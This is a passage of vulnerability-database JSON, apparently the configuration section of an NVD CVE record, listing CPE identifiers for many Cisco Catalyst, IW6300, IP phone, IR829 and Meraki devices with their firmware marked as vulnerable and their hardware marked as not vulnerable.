                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9115axi_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9115axi:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9117_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9117:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9117_ap_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9117_ap:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9117axi_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9117axi:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9120_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9120:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9120_ap_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9120_ap:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9120axe_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9120axe:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9120axi_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9120axi:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9120axp_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9120axp:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9124_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9124:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9124axd_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9124axd:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9124axi_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9124axi:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9130_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9130:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9130_ap_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9130_ap:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9130axe_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9130axe:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9130axi_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9130axi:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_iw6300_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_iw6300:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_iw6300_ac_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_iw6300_ac:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_iw6300_dc_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_iw6300_dc:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_iw6300_dcw_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_iw6300_dcw:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:esw6300_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:esw6300:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ip_phone_6861_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ip_phone_6861:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ip_phone_8821_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ip_phone_8821:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ip_phone_8832_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ip_phone_8832:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ip_phone_8861_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ip_phone_8861:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ip_phone_8865_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ip_phone_8865:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829-2lte-ea-ak9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829-2lte-ea-ak9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829-2lte-ea-bk9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829-2lte-ea-bk9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829-2lte-ea-ek9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829-2lte-ea-ek9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829gw-lte-ga-ck9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829gw-lte-ga-ck9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829gw-lte-ga-ek9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829gw-lte-ga-ek9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829gw-lte-ga-sk9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829gw-lte-ga-sk9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829gw-lte-ga-zk9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829gw-lte-ga-zk9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829gw-lte-na-ak9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829gw-lte-na-ak9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829gw-lte-vz-ak9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829gw-lte-vz-ak9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_gr10_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_gr10:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_gr60_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_gr60:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr12_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr12:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr20_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr20:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr26_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr26:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr30h_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr30h:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr32_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr32:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr33_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr33:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr34_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr34:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr36_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr36:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr42_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr42:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr42e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr42e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr44_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr44:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr45_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr45:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr46_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr46:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr46e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr46e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr52_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr52:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr53_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
